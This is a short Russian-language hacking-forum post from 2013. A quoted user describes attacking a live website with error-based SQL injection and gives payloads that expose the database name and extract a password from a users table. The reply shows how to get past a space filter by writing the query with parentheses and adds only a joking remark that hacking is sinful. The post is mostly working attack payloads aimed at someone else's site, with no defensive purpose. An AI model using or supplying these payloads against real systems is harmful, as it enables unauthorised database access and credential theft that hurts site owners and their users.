01.08.2013, 21:11
|
|
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
С нами:
6941846
Репутация:
-7
|
|
Сообщение от Unknowhacker
Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом
Код:
and(extractvalue(1,concat(0x3a,database())))and'
, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)
Код:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'
задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите! select(password)from(tables)where(id=1)
только грешно взломами....
|
|
|